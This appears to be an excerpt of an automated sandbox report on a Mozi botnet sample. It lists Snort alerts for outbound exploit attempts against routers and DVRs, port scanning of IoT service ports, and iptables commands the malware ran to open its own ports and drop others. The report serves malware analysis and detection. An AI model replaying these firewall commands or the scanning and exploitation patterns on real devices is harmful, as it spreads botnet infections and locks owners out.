                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.96.136.98: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.175.57.220:57814 -> 192.168.2.20:18022
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 101.0.32.248:58269 -> 192.168.2.20:18022
                Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 187.20.92.69:23 -> 192.168.2.20:44564
                Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 187.20.92.69:23 -> 192.168.2.20:44564
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 95.114.166.93: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 5.147.113.227: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 71.77.44.197: -> 192.168.2.20:
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 119.254.195.60: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 180.188.236.155:12560 -> 192.168.2.20:18022
                Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 187.20.92.69:23 -> 192.168.2.20:44566
                Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 187.20.92.69:23 -> 192.168.2.20:44566
                Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 187.20.92.69:23 -> 192.168.2.20:44832
                Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 187.20.92.69:23 -> 192.168.2.20:44832
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.206.52.202: -> 192.168.2.20:
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 80.255.9.34: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 77.181.58.157: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 62.11.163.25: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.175.65.49:1434 -> 192.168.2.20:18022
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 2.205.41.77: -> 192.168.2.20:
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 197.13.3.22: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 4.71.193.226: -> 192.168.2.20:
                Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 187.20.92.69:23 -> 192.168.2.20:44866
                Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 187.20.92.69:23 -> 192.168.2.20:44866
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 133.33.148.13: -> 192.168.2.20:
                Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 187.20.92.69:23 -> 192.168.2.20:44870
                Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 187.20.92.69:23 -> 192.168.2.20:44870
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 185.117.110.244: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 80.228.189.171: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.210.170.210: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.59.19.246: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 50.220.200.185: -> 192.168.2.20:
                Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 187.20.92.69:23 -> 192.168.2.20:44876
                Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 187.20.92.69:23 -> 192.168.2.20:44876
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.212.159.206: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 188.103.236.202: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.193.206.112: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 83.135.84.13: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 172.249.67.48: -> 192.168.2.20:
                Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 187.20.92.69:23 -> 192.168.2.20:45144
                Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 187.20.92.69:23 -> 192.168.2.20:45144
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 95.208.68.123: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 73.3.67.248: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:37406 -> 125.163.72.204:80
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:37406 -> 125.163.72.204:80
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.141.229.150:18307 -> 192.168.2.20:18022
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.141.150.138:1434 -> 192.168.2.20:18022
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.238.31.196: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 168.95.98.254: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:41102 -> 134.84.133.102:80
                Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:40300 -> 114.158.233.160:80
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 202.164.138.177:55447 -> 192.168.2.20:18022
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 117.194.160.46:1434 -> 192.168.2.20:18022
                Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:36272 -> 149.47.68.142:80
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 38.132.107.12: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 77.9.106.56: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:57540 -> 23.219.72.193:80
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:57540 -> 23.219.72.193:80
                Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.219.72.193:80 -> 192.168.2.20:57540
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 88.73.4.65: -> 192.168.2.20:
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 213.160.135.10: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2024915 ET EXPLOIT Possible Vacron NVR Remote Command Execution 192.168.2.20:42586 -> 89.39.161.69:8080
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 84.17.32.179: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 2.206.125.140: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 24.26.24.9: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:35596 -> 66.221.91.189:80
                Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:38046 -> 172.82.182.74:80
                Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:35596 -> 66.221.91.189:80
                Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:38046 -> 172.82.182.74:80
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:41548 -> 219.100.243.45:80
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:41548 -> 219.100.243.45:80
                Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:51012 -> 114.67.85.20:80
                Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:51012 -> 114.67.85.20:80
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 145.145.4.151: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:35956 -> 155.230.225.129:80
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 185.8.165.103: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 46.86.28.7: -> 192.168.2.20:
                Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.78.24.125:80 -> 192.168.2.20:42680
                Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:42680 -> 23.78.24.125:80
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.39.50.75: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:43638 -> 182.254.240.127:80
                Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:43638 -> 182.254.240.127:80
                Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 92.122.164.134:80 -> 192.168.2.20:37352
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.206.158.170: -> 192.168.2.20:
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 158.165.7.160: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:50960 -> 75.2.41.208:80
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:50960 -> 75.2.41.208:80
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 45.39.76.209: -> 192.168.2.20:
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 149.11.89.129: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 89.104.29.43: -> 192.168.2.20:
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 211.196.102.221: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 24.214.81.66: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:54438 -> 209.182.209.236:80
                Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:54438 -> 209.182.209.236:80
                Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:35018 -> 168.226.35.54:80
                Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:35018 -> 168.226.35.54:80
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 217.251.0.109: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.175.102.43:19221 -> 192.168.2.20:18022
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 121.43.39.69:2157 -> 192.168.2.20:18022
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 118.37.10.100:20358 -> 192.168.2.20:18022
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 213.91.166.30: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:45446 -> 27.124.38.242:80
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:45446 -> 27.124.38.242:80
                Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:42960 -> 171.247.8.159:80
                Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:57376 -> 216.164.6.45:80
                Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:57376 -> 216.164.6.45:80
                Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:36678 -> 164.132.44.102:80
                Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:37580 -> 65.110.89.33:80
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 45.32.56.177: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:51776 -> 38.35.98.151:80
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.0.80.86: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 168.95.154.5: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:56148 -> 79.134.64.48:80
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:56148 -> 79.134.64.48:80
                Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:56922 -> 52.58.36.52:80
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 188.1.231.30: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 94.218.212.205: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:48564 -> 104.17.41.126:80
                Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:48564 -> 104.17.41.126:80
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 80.86.69.17: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.213.241.180: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:54194 -> 157.131.125.97:80
                Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:54194 -> 157.131.125.97:80
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 62.4.89.110: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 188.108.97.228: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 2.206.231.226: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:37050 -> 186.95.149.6:80
                Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:37050 -> 186.95.149.6:80
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 125.206.16.131: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.214.81.98: -> 192.168.2.20:
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 130.34.242.248: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2024915 ET EXPLOIT Possible Vacron NVR Remote Command Execution 192.168.2.20:51678 -> 31.10.38.98:8080
                Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:35232 -> 199.204.251.131:80
                Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:37352 -> 92.122.164.134:80
                Connects to many ports of the same IP (likely port scanning)Show sources
                Source: global trafficTCP traffic: 52.0.157.125 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 9.100.19.116 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 65.184.246.105 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 60.167.18.127 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 84.40.97.17 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 173.7.142.106 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 180.73.169.36 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 166.58.177.197 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 94.169.172.220 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 128.62.193.183 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 136.5.82.110 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 99.47.34.28 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 128.69.73.19 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 196.101.144.179 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 146.168.208.157 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 78.91.242.78 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 186.198.44.96 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 214.196.245.191 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 95.244.105.198 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 142.162.240.88 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 44.163.103.21 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 163.192.137.169 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 117.1.97.153 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 200.172.177.133 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 34.9.142.75 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 193.29.122.130 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 31.157.161.123 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 165.11.161.224 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 78.74.223.1 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 193.94.174.79 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 217.103.71.102 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 204.185.64.60 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 141.248.130.228 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 80.211.20.126 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 7.108.184.228 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 140.6.78.199 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 6.94.160.221 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 14.81.232.70 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 55.177.210.173 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 8.169.91.139 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 52.224.63.176 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 135.53.39.119 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 144.89.67.225 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 140.40.46.56 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 29.145.147.14 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 143.27.173.36 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 173.147.84.217 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 129.86.130.59 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 22.102.33.44 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 184.185.74.165 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 164.69.135.124 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 117.254.218.74 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 130.11.96.200 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 55.81.150.224 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 2.25.210.178 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 35.248.184.105 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 73.31.128.199 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 110.196.111.163 ports 2,5,6,8,9,52869
                Executes the "iptables" command to insert, remove and/or manipulate rulesShow sources
                Source: /bin/sh (PID: 4635)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 38798 -j ACCEPT
                Source: /bin/sh (PID: 4668)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 38798 -j ACCEPT
                Source: /bin/sh (PID: 4671)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 38798 -j ACCEPT
                Source: /bin/sh (PID: 4707)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 38798 -j ACCEPT
                Source: /bin/sh (PID: 4733)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 38798 -j ACCEPT
                Source: /bin/sh (PID: 4754)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 38798 -j ACCEPT
                Source: /bin/sh (PID: 4772)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 38798 -j ACCEPT
                Source: /bin/sh (PID: 4776)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 38798 -j ACCEPT
                Source: /bin/sh (PID: 4811)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
                Source: /bin/sh (PID: 4814)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
                Source: /bin/sh (PID: 4823)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
                Source: /bin/sh (PID: 4846)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                Source: /bin/sh (PID: 4894)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
                Source: /bin/sh (PID: 4920)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
                Source: /bin/sh (PID: 4944)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
                Source: /bin/sh (PID: 4948)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
                Source: /bin/sh (PID: 4957)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
                Source: /bin/sh (PID: 4980)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
                Source: /bin/sh (PID: 5021)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
                Source: /bin/sh (PID: 5024)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
                Source: /bin/sh (PID: 5032)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
                Source: /bin/sh (PID: 5053)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
                Source: /bin/sh (PID: 5080)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
                Source: /bin/sh (PID: 5107)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
                Source: /bin/sh (PID: 5135)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 18022 -j ACCEPT
                Source: /bin/sh (PID: 5149)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 18022 -j ACCEPT
                Source: /bin/sh (PID: 5172)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 18022 -j ACCEPT
                Source: /bin/sh (PID: 5186)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 18022 -j ACCEPT
                Source: /bin/sh (PID: 5210)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 18022 -j ACCEPT
                Source: /bin/sh (PID: 5227)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 18022 -j ACCEPT
                Source: /bin/sh (PID: 5249)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 18022 -j ACCEPT
                Source: /bin/sh (PID: 5252)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 18022 -j ACCEPT
                Uses known network protocols on non-standard portsShow sources
                Source: unknownNetwork traffic detected: HTTP traffic on port 34784 -> 7574
                Source: global trafficTCP traffic: 192.168.2.20:41356 -> 2.25.210.178:37215
                Source: global trafficTCP traffic: 192.168.2.20:34848 -> 184.164.122.183:5555
                Source: global trafficTCP traffic: 192.168.2.20:33446 -> 83.138.58.60:8080
                Source: global trafficTCP traffic: 192.168.2.20:44088 -> 77.89.211.235:7574
                Source: global trafficTCP traffic: 192.168.2.20:39094 -> 110.196.111.163:52869
                Source: global trafficTCP traffic: 192.168.2.20:46462 -> 188.39.11.49:8080
                Source: global trafficTCP traffic: 192.168.2.20:35438 -> 21.167.23.229:8443
                Source: global trafficTCP traffic: 192.168.2.20:38082 -> 154.228.225.43:7574
                Source: global trafficTCP traffic: 192.168.2.20:44312 -> 142.185.51.138:52869
                Source: global trafficTCP traffic: 192.168.2.20:57324 -> 121.235.253.2:49152
                Source: global trafficTCP traffic: 192.168.2.20:49620 -> 29.145.147.14:37215
                Source: global trafficTCP traffic: 192.168.2.20:39532 -> 103.85.31.98:5555
                Source: global trafficTCP traffic: 192.168.2.20:48026 -> 158.169.216.109:81
                Source: global trafficTCP traffic: 192.168.2.20:33318 -> 133.43.111.70:81
                Source: global trafficTCP traffic: 192.168.2.20:45632 -> 129.12.160.142:5555
                Source: global trafficTCP traffic: 192.168.2.20:39952 -> 94.167.107.6:8443
                Source: global trafficTCP traffic: 192.168.2.20:36110 -> 87.70.234.237:5555
                Source: global trafficTCP traffic: 192.168.2.20:57140 -> 37.146.10.10:5555
                Source: global trafficTCP traffic: 192.168.2.20:33132 -> 12.106.20.19:7574
                Source: global trafficTCP traffic: 192.168.2.20:54950 -> 94.169.172.220:49152
                Source: global trafficTCP traffic: 192.168.2.20:56078 -> 110.102.65.9:8080
                Source: global trafficTCP traffic: 192.168.2.20:50314 -> 41.177.29.19:8443
                Source: global trafficTCP traffic: 192.168.2.20:49832 -> 120.206.173.159:8443
                Source: global trafficTCP traffic: 192.168.2.20:52776 -> 147.73.77.123:5555
                Source: global trafficTCP traffic: 192.168.2.20:57042 -> 106.249.234.237:8080
                Source: global trafficTCP traffic: 192.168.2.20:53376 -> 23.216.220.40:8443
